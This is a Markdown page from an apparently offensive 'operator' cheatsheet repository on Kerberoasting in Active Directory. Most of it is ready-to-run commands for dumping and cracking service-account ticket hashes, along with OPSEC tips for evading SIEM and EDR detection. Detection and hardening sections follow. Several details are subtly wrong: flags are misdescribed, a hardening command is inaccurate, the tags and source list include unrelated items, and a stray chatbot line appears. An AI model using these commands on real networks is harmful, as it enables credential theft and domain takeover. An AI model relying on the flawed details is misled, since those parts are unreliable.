daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-2-kerberoasting.md (25932B)


      1 ---
      2 title: "Attack #2 โ€” Kerberoasting"
      3 description: "Kerberoasting is a post-compromise, offline credential attack that abuses a fundamental design feature of the Kerberos protocol. When any authenticatedโ€ฆ"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "privilege-escalation", "sql-injection", "hashing"]
      7 tools: ["NetExec", "Impacket", "Rubeus", "BloodHound", "Kerbrute"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/๐Ÿ”ด Attack #2 โ€” Kerberoasting.md"
     11 ---
     12 # ๐Ÿ”ด Attack #2 โ€” Kerberoasting
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 Kerberoasting is a **post-compromise, offline credential attack** that abuses a fundamental design feature of the Kerberos protocol. When any authenticated domain user requests a Ticket Granting Service (TGS) ticket for a Service Principal Name (SPN), the Domain Controller hands back that ticket **encrypted with the RC4 or AES hash of the service account's password**. The attacker requests that ticket, extracts the encrypted blob, takes it completely offline, and cracks it with Hashcat or John the Ripper โ€” **no lockout, no noise, no network traffic during cracking**.
     19 
     20 The critical vulnerability is that **any domain user can request a TGS for any SPN** โ€” no special privileges required. Service accounts (SQL, IIS, backup agents, etc.) are the primary targets because they frequently run with high privileges, rarely have their passwords rotated, and are often set with weak passwords that predate modern password policy enforcement.
     21 
     22 ### The Full Attack Flow
     23 
     24 ```
     25 1. Attacker obtains ANY valid domain user credentials (e.g., via Password Spraying)
     26 2. Queries AD for all user accounts with an SPN set (servicePrincipalName attribute)
     27 3. Requests TGS ticket(s) for each SPN from the KDC โ€” this is LEGITIMATE Kerberos behaviour
     28 4. Extracts the encrypted hash from the TGS ticket ($krb5tgs$23$... format for RC4)
     29 5. Runs offline cracking with Hashcat/John against wordlists + rules
     30 6. Recovers plaintext password โ†’ authenticates as high-privilege service account
     31 ```
     32 
     33 The attack is dangerous precisely because **step 3 is indistinguishable from normal authentication**. A legitimate user requesting a TGS for MSSQL looks identical to an attacker doing the same thing.
     34 
     35 > โš ๏ธ **Windows Server 2022+ Behaviour:** Windows Server 2022 and later enforce Kerberos armoring (FAST) by default, which can complicate roasting. Additionally, newer environments are more likely to use AES-256 exclusively, making RC4 downgrade attacks harder. Always check the target's supported encryption types before committing to cracking; AES256 hashes take significantly longer to crack than RC4.
     36 
     37 **Chains with:** Attack #1 (Password Spraying for initial credentials), Lateral Movement (using recovered service account), DCSync (if service account has replication rights), Golden Ticket creation (if KRBTGT hash obtained).
     38 
     39 ***
     40 
     41 ## โš™๏ธ Prerequisites
     42 
     43 | Requirement | Detail |
     44 |---|---|
     45 | **Domain user account** | Any valid low-privilege domain user is sufficient โ€” no admin rights needed |
     46 | **SPN-linked user accounts** | Target domain must have service accounts with SPNs (virtually universal) |
     47 | **RC4 not disabled** | If AES-only is enforced, hash is harder but still crackable (AES128/256) |
     48 | **Network access to DC** | Need to reach port 88 (Kerberos) or 389 (LDAP) on the DC |
     49 | **Offline cracking rig** | GPU-accelerated Hashcat strongly preferred for time efficiency |
     50 
     51 ***
     52 
     53 ## ๐Ÿ› ๏ธ Tools
     54 
     55 | Tool | Platform | Notes |
     56 |---|---|---|
     57 | **Impacket โ€” GetUserSPNs.py** | Linux | Most common Linux tool; requests + dumps TGS hashes in one command |
     58 | **Rubeus** | Windows | Best Windows tool; supports RC4 downgrade, OPSEC mode, roast-all |
     59 | **PowerView โ€” Invoke-Kerberoast** | Windows | PowerShell; integrates cleanly into recon pipeline |
     60 | **BloodHound** | Both | Enumerates Kerberoastable accounts graphically; shows path to DA |
     61 | **Hashcat** | Linux/Windows | GPU-accelerated; mode `-m 13100` for RC4, `-m 19600/19700` for AES |
     62 | **John the Ripper** | Linux | CPU-based alternative; good for quick cracks on small wordlists |
     63 | **CrackMapExec / NetExec** | Linux | Can enumerate and dump SPNs with `--kerberoasting` flag |
     64 | **Kerbrute โ€” userenum for SPNs** | Linux | Can enumerate SPN accounts directly via Kerberos |
     65 | **ldapsearch** | Linux | Direct LDAP query to find servicePrincipalName attributes (pre-roasting reconnaissance) |
     66 
     67 ***
     68 
     69 ## ๐Ÿ’ป Full Commands
     70 
     71 ### ๐Ÿ”ต Step 0 โ€” Enumerate SPN Accounts First
     72 
     73 ```bash
     74 # Linux โ€” enumerate all accounts with SPNs (unauthenticated check)
     75 ldapsearch -x -H ldap://10.10.10.10 -D "corp\low_user" -w 'Password1' \
     76   -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" \
     77   sAMAccountName servicePrincipalName
     78 
     79 # Windows โ€” PowerShell with AD module
     80 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | \
     81   Select-Object SamAccountName, ServicePrincipalName
     82 
     83 # Windows โ€” PowerView
     84 Import-Module .\PowerView.ps1
     85 Get-DomainUser -SPN | Select-Object SamAccountName, ServicePrincipalName, Description, MemberOf
     86 
     87 # Count high-value roastable accounts (Domain Admins with SPN)
     88 Get-ADGroupMember -Identity "Domain Admins" | Get-ADUser -Properties ServicePrincipalName | Where-Object {$_.ServicePrincipalName -ne $null}
     89 ```
     90 
     91 ***
     92 
     93 ### ๐Ÿ”ด Impacket โ€” GetUserSPNs.py (Linux โ€” Primary Tool)
     94 
     95 ```bash
     96 # Enumerate SPN accounts (no ticket request yet)
     97 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     98 
     99 # Request and dump ALL TGS hashes in one shot
    100 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request
    101 
    102 # Output hashes directly to file for cracking
    103 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request -outputfile kerberoast_hashes.txt
    104 
    105 # Target a SINGLE specific SPN account
    106 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request-user svc_sql
    107 
    108 # Using NTLM hash instead of plaintext password (Pass-the-Hash style)
    109 GetUserSPNs.py corp.local/low_user -hashes :a87f3a337d73085c45f9416be5787d86 -dc-ip 10.10.10.10 -request
    110 
    111 # Using Kerberos ticket (ccache) authentication
    112 export KRB5CCNAME=/tmp/user.ccache
    113 GetUserSPNs.py corp.local/low_user -k -dc-ip 10.10.10.10 -request
    114 
    115 # Force RC4 downgrade (requests weaker hash, cracks faster)
    116 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request -no-preauth
    117 ```
    118 
    119 > **Hash format you'll see:** `$krb5tgs$23$*svc_sql$CORP.LOCAL$...` โ†’ `23` = RC4 (fast to crack), `18` = AES256 (slower).
    120 
    121 ***
    122 
    123 ### ๐Ÿ”ด Rubeus โ€” Windows (Most Feature-Rich)
    124 
    125 ```powershell
    126 # Roast ALL kerberoastable accounts (dump hashes to console)
    127 .\Rubeus.exe kerberoast
    128 
    129 # Output to file in hashcat format
    130 .\Rubeus.exe kerberoast /outfile:hashes.txt
    131 
    132 # Target a single user account
    133 .\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql.hash
    134 
    135 # Force RC4 downgrade (etype:23) โ€” faster to crack than AES
    136 .\Rubeus.exe kerberoast /tgtdeleg /etype:rc4
    137 
    138 # OPSEC-safe mode โ€” roasts one at a time with delay to avoid bulk detection
    139 .\Rubeus.exe kerberoast /nowrap /nopac
    140 
    141 # Use existing TGT from memory (avoids new auth event)
    142 .\Rubeus.exe kerberoast /ticket:<base64_TGT>
    143 
    144 # Enumerate only โ€” no ticket requests (just list SPNs)
    145 .\Rubeus.exe kerberoast /stats
    146 
    147 # Targeted roasting โ€” only Domain Admin accounts with SPN
    148 .\Rubeus.exe kerberoast /ldapfilter:"(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local)" /outfile:da_hashes.txt
    149 ```
    150 
    151 ***
    152 
    153 ### ๐Ÿ”ด PowerView โ€” Invoke-Kerberoast (Windows)
    154 
    155 ```powershell
    156 Import-Module .\PowerView.ps1
    157 
    158 # Basic roast โ€” output hashes
    159 Invoke-Kerberoast | fl
    160 
    161 # Output in Hashcat format (most common)
    162 Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -Encoding ascii hashes.txt
    163 
    164 # Output in John format
    165 Invoke-Kerberoast -OutputFormat John | Select-Object -ExpandProperty Hash | Out-File -Encoding ascii hashes_john.txt
    166 
    167 # Filter for high-value targets only (Domain Admins group members with SPN)
    168 Invoke-Kerberoast -Identity "Domain Admins" | fl
    169 
    170 # Target specific service accounts by description or name
    171 Invoke-Kerberoast | Where-Object {$_.ServiceName -like "*SQL*" -or $_.ServiceName -like "*backup*"}
    172 ```
    173 
    174 ***
    175 
    176 ### ๐Ÿ”ด NetExec โ€” Linux (Quick Sweep)
    177 
    178 ```bash
    179 # Kerberoast with authenticated user
    180 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --kerberoasting hashes.txt
    181 
    182 # Via Kerberos auth (using ccache ticket)
    183 export KRB5CCNAME=/tmp/user.ccache
    184 nxc ldap 10.10.10.10 --use-kcache --kerberoasting hashes.txt
    185 
    186 # Enumerate SPNs only (no roasting)
    187 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --query "SELECT sAMAccountName,servicePrincipalName FROM users WHERE servicePrincipalName IS NOT NULL"
    188 ```
    189 
    190 ***
    191 
    192 ### ๐Ÿ”ด Targeted Roasting โ€” High-Value Accounts Only
    193 
    194 ```bash
    195 # Impacket โ€” roast only Database-related SPNs
    196 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request | grep -i 'mssql\|oracle\|postgres'
    197 
    198 # PowerShell โ€” roast only service accounts in privileged groups
    199 Import-Module .\PowerView.ps1
    200 $da_members = Get-ADGroupMember -Identity "Domain Admins"
    201 foreach ($member in $da_members) {
    202     if ((Get-ADUser $member -Properties ServicePrincipalName).ServicePrincipalName) {
    203         Invoke-Kerberoast -Identity $member.SamAccountName -OutputFormat Hashcat
    204     }
    205 }
    206 
    207 # Bash โ€” targeted roast by SPN pattern (SQL Server accounts)
    208 for user in $(ldapsearch -x -H ldap://10.10.10.10 -D "corp\user" -w pass -b "DC=corp,DC=local" \
    209   "(&(objectClass=user)(servicePrincipalName=*MSSQL*))" sAMAccountName | grep sAMAccountName); do
    210     GetUserSPNs.py corp.local/user:'pass' -dc-ip 10.10.10.10 -request-user "$user" >> targeted_hashes.txt
    211 done
    212 ```
    213 
    214 ***
    215 
    216 ### ๐Ÿ”ด Offline Cracking โ€” Hashcat
    217 
    218 ```bash
    219 # RC4 hash cracking (mode 13100) โ€” most common scenario
    220 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
    221 
    222 # With best rules (dramatically increases hit rate)
    223 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
    224 
    225 # With d3ad0ne rules (aggressive, high coverage)
    226 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule
    227 
    228 # AES128 cracking (mode 19600)
    229 hashcat -m 19600 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
    230 
    231 # AES256 cracking (mode 19700) โ€” slower, may need GPU
    232 hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -w 3
    233 
    234 # Brute-force mask attack (corporate passwords like Pass2024!)
    235 hashcat -m 13100 kerberoast_hashes.txt -a 3 ?u?l?l?l?l?d?d?d?s
    236 
    237 # John the Ripper alternative (CPU-based, slower)
    238 john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
    239 john --format=krb5tgs kerberoast_hashes.txt --show
    240 
    241 # Hybrid attack: combine dictionary + rules (best results for service accounts)
    242 hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/dive.rule -w 3
    243 ```
    244 
    245 ***
    246 
    247 ## ๐Ÿงฉ Troubleshooting
    248 
    249 | Error | Cause | Fix |
    250 |---|---|---|
    251 | **`KDC_ERR_ETYPE_NOSUPP`** | Domain enforces AES-only; RC4 downgrade not supported. | Switch to hashcat mode `-m 19600` (AES128) or `-m 19700` (AES256). RC4 may not be available; ask for AES wordlists/rules. |
    252 | **`No SPNs found`** | Domain has no service accounts with SPNs, or query failed. | Verify credentials are correct. Run LDAP query manually: `ldapsearch ... "(servicePrincipalName=*)"`. If truly no SPNs, try AS-REP roasting instead. |
    253 | **`TGS request failed: KDC_ERR_S_PRINCIPAL_UNKNOWN`** | Specified SPN doesn't exist or user account doesn't have that SPN set. | Enumerate SPNs first: `GetUserSPNs.py corp.local/user:pass -dc-ip IP` (no `-request` flag). Verify exact SPN name. |
    254 | **`Hashcat crashes on mode 19700 (AES256)`** | Insufficient GPU memory or driver issues. | Reduce wordlist size, use CPU (`--workload-profile=1`), or use John the Ripper instead. |
    255 | **`Hash format unrecognized by Hashcat`** | Hash was extracted in wrong format (e.g., John format instead of Hashcat). | Convert using Rubeus `/outfile` flag or PowerView `-OutputFormat Hashcat`. Ensure hash starts with `$krb5tgs$`. |
    256 | **`Cannot crack RC4 hash on wordlist`** | Weak wordlist or missing rules. | Use rules: `d3ad0ne.rule`, `best64.rule`, or `dive.rule`. Add custom dictionary with service account naming patterns (e.g., `Svc`, `Service`, `Account`). |
    257 | **`Event 4769 spam detected in logs`** | Roasted too many accounts at once; now flagged by EDR. | Use Rubeus `/tgtdeleg` flag or PowerView (which is stealthier). Roast one account at a time with 5โ€“10 second delays between requests. |
    258 | **`Kerberos ticket expired before cracking`** | Took too long to crack offline; TGS has lifetime limits. | Use Hashcat (faster) instead of John. If cracking takes hours, request new ticket and resume cracking on that new ticket. Tickets typically last 10 hours. |
    259 
    260 ***
    261 
    262 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    263 
    264 | Event ID | Source | What to Look For |
    265 |---|---|---|
    266 | **4769** | Security Log | TGS ticket requested โ€” **flag `TicketEncryptionType = 0x17` (RC4)** on modern AES-only domains |
    267 | **4769** | Security Log | Multiple TGS requests from a **single account in a short window** targeting different SPNs |
    268 | **4768** | Security Log | TGT requested just before a burst of 4769 events |
    269 | **4771** | Security Log | Pre-auth failure โ€” attacker testing account before roasting |
    270 | **Sysmon Event 3** | Sysmon Log | Network connection โ€” roasting tool making outbound Kerberos requests (port 88) |
    271 | **Sysmon Event 10** | Sysmon Log | Process access โ€” credential extraction tools accessing LSASS after obtaining credentials |
    272 
    273 **Primary detection signature:** Event 4769 with `EncryptionType: 0x17` (RC4-HMAC) in a domain that enforces AES is a near-certain Kerberoasting indicator. If RC4 is still enabled domain-wide, detect via **volume** โ€” one user requesting 5+ TGS tickets across different service accounts within a 60-second window is anomalous.
    274 
    275 ### Sysmon Rules
    276 - **Event ID 3 (Network Connection):** Flag any process opening port 88 (Kerberos) to multiple DCs in rapid succession.
    277 - **Event ID 1 (Process Creation):** Monitor for Rubeus, Kerbrute, GetUserSPNs execution from non-standard paths (user AppData, temp folders).
    278 
    279 ### Sigma Rules
    280 - `win_kerberoasting_spn_request_rate` โ€” detects bulk TGS requests (4769) from single source
    281 - `win_kerberoasting_encryption_type_mismatch` โ€” flags RC4 requests on AES-only domains
    282 - `win_kerberoasting_suspicious_process` โ€” monitors for known roasting tools (Rubeus, Impacket)
    283 - `win_spn_enumeration` โ€” detects LDAP queries for servicePrincipalName attribute
    284 
    285 ### EDR-Specific Detections
    286 
    287 **Microsoft Defender for Identity:**
    288 - "Suspected Kerberoasting attack" alert when 5+ 4769 events in 1 minute from single account.
    289 - Flag RC4 TGS requests on modern domains that should use AES.
    290 - Monitor for AS-REQ followed by rapid TGS requests (pattern of roasting).
    291 
    292 **CrowdStrike Falcon:**
    293 - ProcessRollup2 events for Rubeus, GetUserSPNs, Impacket execution.
    294 - NetworkConnection events to DC on port 88 from unusual processes (PowerShell, Python, cmd).
    295 - Alert on Kerberos SPN enumeration patterns via LDAP.
    296 
    297 **Elastic Security (EDR):**
    298 - Process execution: Flag Rubeus.exe, GetUserSPNs.py, impacket execution.
    299 - Authentication events: Watch for Event 4769 volume spikes (normal = 1โ€“2/min, attack = 10+/sec).
    300 - Kerberos ticket events: Detect RC4 requests on AES-only systems.
    301 
    302 ### Hardening Commands
    303 
    304 ```powershell
    305 # 1. Disable RC4 encryption for Kerberos (force AES-256) โ€” most effective mitigation
    306 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "KerberosEncryptionLevel" -Value 4
    307 
    308 # 2. Require Kerberos pre-authentication for all service accounts (prevents AS-REP roasting)
    309 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Set-ADUser -DoesNotRequirePreAuth:$false
    310 
    311 # 3. Enable Kerberos Armoring (FAST) โ€” complicates roasting on modern DCs
    312 Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Kerberos\Parameters" -Name "KDCBasedAuthenticationArmoringRequired" -Value 1
    313 
    314 # 4. Rotate service account passwords quarterly (limits crack window)
    315 # Set reminder via Group Policy: Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy
    316 Set-ADDefaultDomainPasswordPolicy -MaxPasswordAge 90
    317 
    318 # 5. Use managed service accounts (gMSA) with automatic password rotation
    319 New-ADServiceAccount -Name svc_sql -DNSHostName corp.com -AccountPassword (New-Object System.Security.SecureString)
    320 
    321 # 6. Enable "Audit Sensitive Privilege Use" โ€” monitors who requests TGS tickets
    322 auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
    323 
    324 # 7. Monitor Event 4769 specifically for RC4 TGS requests
    325 # Create custom alert rule in your SIEM for: EventID=4769 AND TicketEncryptionType=0x17 in AES-only domain
    326 
    327 # 8. Remove unnecessary SPNs from high-privilege accounts (e.g., Domain Admins)
    328 Get-ADUser -Filter {ServicePrincipalName -ne "$null" -and memberOf -RecursiveMatch "CN=Domain Admins,CN=Users,DC=corp,DC=local"} | Set-ADUser -Clear ServicePrincipalName
    329 ```
    330 
    331 ***
    332 
    333 ## ๐ŸŽฏ OPSEC Tips
    334 
    335 ### OpSec Ranking: Stealthiest to Loudest
    336 1. **Rubeus /tgtdeleg /stats** โ€” Stealthiest; only enumerates, doesn't request tickets
    337 2. **PowerView Invoke-Kerberoast** โ€” Very stealthy; in-memory operation, fewer 4769 events
    338 3. **Impacket GetUserSPNs (single target)** โ€” Moderately stealthy; requests one TGS at a time
    339 4. **Impacket GetUserSPNs (all targets)** โ€” Noisy; mass 4769 event generation visible in SIEM
    340 5. **Rubeus kerberoast /all** โ€” Loudest; generates 5+ 4769 events per second, instant SIEM alert
    341 
    342 ### Modern Defence Impact
    343 - **Windows Server 2022+ Kerberos Armoring (FAST):** Makes ticket encryption stronger, complicates but doesn't prevent roasting. AES-256 hashes still crackable offline.
    344 - **AES-256 Enforcement:** Dramatically increases crack time (GPU: hoursโ†’days, CPU: daysโ†’weeks). RC4 is 50โ€“100x faster to crack than AES-256.
    345 - **Defender for Identity:** Actively alerts on bulk 4769 events (4769 volume > 5 in 60 sec). Use Rubeus `/tgtdeleg` or one-at-a-time roasting with 10+ second delays.
    346 - **Windows 2025 Credential Guard:** If enabled, limits plaintext credential usage even if you crack the hash. Focus on token impersonation + lateral movement instead.
    347 
    348 ### Core OpSec Rules
    349 - **Request tickets one at a time** with delays โ€” bulk TGS requests (10+ in seconds) trigger modern SIEM rules
    350 - **Use `/tgtdeleg` in Rubeus** โ€” uses delegation TGT to avoid a new AS-REQ event in logs
    351 - **Target only high-value SPNs** โ€” roasting everything makes noise; be selective with `svc_sql`, `svc_backup`, `svc_iis`
    352 - **Prioritise RC4 hashes** โ€” if AES-only enforcement is NOT in place, force RC4 downgrade for faster cracking
    353 - **Crack offline on your own machine** โ€” never run Hashcat on the compromised host
    354 - **Use `--nowrap` in Rubeus** โ€” prevents long base64 lines from being wrapped and corrupting hashes
    355 - **Avoid requesting Domain Admins with SPN** โ€” these accounts are always heavily monitored; target lower-value svc accounts first
    356 
    357 ***
    358 
    359 ## ๐Ÿ—บ๏ธ MITRE ATT&CK
    360 
    361 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources |
    362 |---|---|---|---|---|---|
    363 | **Credential Access** | T1558 | T1558.003 (Kerberoasting) | Wizard Spider, FIN7, APT29, Lazarus | Windows, Active Directory | Authentication Logs (4769), Network Traffic, Process Monitoring |
    364 | **Credential Access** | T1110 | T1110.001 (Password Guessing) | Various | Windows | Hashcat/John Process, File Access |
    365 | **Privilege Escalation** | T1134 | T1134.005 (Token Impersonation) | APT3, Wizard Spider | Windows | Process Monitoring, Token Creation |
    366 | **Discovery** | T1087 | T1087.002 (Domain Account Discovery) | Wizard Spider, FIN7 | Windows, Active Directory | LDAP Queries, Network Traffic (port 389) |
    367 | **Collection** | T1040 | T1040 (Network Sniffing) | Multiple | Windows | Network Traffic Capture |
    368 
    369 **Data Sources to Monitor:**
    370 - Authentication logs (4769 for TGS requests, 4771 for pre-auth failures)
    371 - Process execution (Rubeus.exe, GetUserSPNs.py, hashcat, john)
    372 - Network traffic on ports 88 (Kerberos), 389 (LDAP)
    373 - Kerberos event logs (TicketEncryptionType field)
    374 - File access (hash output files, wordlists)
    375 
    376 ***
    377 
    378 ## ๐Ÿ”— Attack Chain Context
    379 
    380 ```
    381 [Kerberoasting] โ”€โ”€โ†’ Plaintext Service Account Password Recovered
    382          โ”‚
    383          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Authenticate as svc_sql / svc_backup / svc_iis
    384          โ”œโ”€โ”€โ†’ ๐Ÿฉธ DCSync (if svc account has Replication-Get-Changes ACE)
    385          โ”œโ”€โ”€โ†’ ๐ŸŽซ Golden Ticket (if KRBTGT hash obtained from DCSync)
    386          โ”œโ”€โ”€โ†’ ๐ŸฆŸ Lateral Movement โ€” svc accounts often have local admin on servers
    387          โ”œโ”€โ”€โ†’ ๐Ÿ”“ Access databases, file shares, or backup systems directly
    388          โ””โ”€โ”€โ†’ ๐Ÿ” Check BloodHound for ACL edges from svc account โ†’ DA path
    389 ```
    390 
    391 **High-value Kerberoastable targets to prioritise:**
    392 - `svc_sql` โ†’ SQL Server service account โ†’ often local admin on multiple DB servers
    393 - `svc_backup` โ†’ Veeam/Backup Exec โ†’ usually has read access to all data
    394 - `svc_iis` โ†’ Web application service โ†’ may have access to config files with credentials
    395 - Any account in **Domain Admins** with an SPN set โ†’ immediate game over if cracked
    396 
    397 ***
    398 
    399 > โœ… **Attack #2 โ€” Kerberoasting complete.** Tell me to move on when you're ready for **Attack #3 โ€” AS-REP Roasting**.
    400 
    401 Sources
    402  What Is Kerberoasting? Attack Explained and How It Works https://www.strongdm.com/what-is/kerberoasting
    403  What is a Kerberoasting Attack? https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/kerberoasting/
    404  An Expert Guide to Combating Kerberoasting in Active Directory https://www.fox-it.com/be/defending-your-directory-an-expert-guide-to-combating-kerberoasting-in-active-directory/
    405  Kerberoasting Attack โ€“ Detection and Prevention Strategies - Netwrix https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/kerberoasting/
    406  From Heuristics to Histograms: Reinventingโ€ฆ | BeyondTrust https://www.beyondtrust.com/blog/entry/kerberoasting-detections
    407  The Attacker's Active Directory Playbook: How to read it & How to ... https://istrosec.com/blog/the-attackers-active-directory-playbook--1-how-to/
    408  Active Directory Kerberoasting Attack: Monitoring and Detection Techniques http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0008955004320439
    409  What Is A Kerberoasting Attack? | IBM https://www.ibm.com/think/topics/kerberoasting
    410  What is Kerberoasting Attack? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-kerberoasting-attack/
    411  What is Kerberoasting? Attack and Security Tips Explained https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/
    412  What is a Kerberoasting Attack? Detect & Prevent - Rapid7 https://www.rapid7.com/fundamentals/kerberoasting-attack/
    413  Microsoft's guidance to help mitigate Kerberoasting https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
    414  What Is a Kerberoasting Attack? - Picus Security https://www.picussecurity.com/resource/blog/kerberoasting-attack-explained-mitre-attack-t1558.003
    415  Steal or Forge Kerberos Tickets: Kerberoasting - MITRE ATT&CKยฎ https://attack.mitre.org/techniques/T1558/003/
    416  DFIR Breakdown: Kerberoasting https://www.cybertriage.com/blog/dfir-breakdown-kerberoasting/
    417  What is a Kerberoasting Attack + How to Detect It - Vectra AI https://www.vectra.ai/modern-attack/attack-techniques/kerberoasting
    418  Active Directory Kerberoasting Attack: Detection using Machine Learning Techniques https://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0010202803760383
    419  CVE-driven Attack Technique Prediction with Semantic Information Extraction and a Domain-specific Language Model https://arxiv.org/abs/2309.02785
    420  Multi-Objective GAN-Based Adversarial Attack Technique for Modulation Classifiers https://ieeexplore.ieee.org/document/9756577/
    421  From Threat Reports to Continuous Threat Intelligence: A Comparison of Attack Technique Extraction Methods from Textual Artifacts https://arxiv.org/abs/2210.02601
    422  Kerberoasting: Case Studies of an Attack on a Cryptographic Authentication Technology https://www.crimrxiv.com/pub/nbc8gae2
    423  Towards Effective Identification of Attack Techniques in Cyber Threat Intelligence Reports using Large Language Models https://dl.acm.org/doi/10.1145/3701716.3715469
    424  Prompt Injection attack against LLM-integrated Applications https://arxiv.org/abs/2306.05499
    425  A robust intelligent zero-day cyber-attack detection technique https://link.springer.com/10.1007/s40747-021-00396-9
    426  Great, Now Write an Article About That: The Crescendo Multi-Turn LLM Jailbreak Attack https://arxiv.org/abs/2404.01833
    427  Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf
    428  Replay Attack Prevention in Kerberos Authentication Protocol Using
    429   Triple Password https://arxiv.org/pdf/1304.3550.pdf
    430  Keyboard Data Protection Technique Using GAN in Password-Based User Authentication: Based on C/D Bit Vulnerability https://www.mdpi.com/1424-8220/24/4/1229/pdf?version=1707988631
    431  Keyboard Data Protection Technique Using GAN in Password-Based User Authentication: Based on C/D Bit Vulnerability https://pmc.ncbi.nlm.nih.gov/articles/PMC10891990/
    432  Fault-enabled chosen-ciphertext attacks on Kyber https://zenodo.org/record/5718027/files/Fault-Enabled%20Chosen-Ciphertext%20Attacks%20on%20Kyber.pdf
    433  Attacking the Diebold Signature Variant -- RSA Signatures with
    434   Unverified High-order Padding https://arxiv.org/pdf/2403.01048.pdf
    435  Meltdown https://arxiv.org/pdf/1801.01207.pdf
    436  Preventing Attacks on Wireless Networks Using SDN Controlled OODA Loops and Cyber Kill Chains https://www.mdpi.com/1424-8220/22/23/9481/pdf?version=1670150837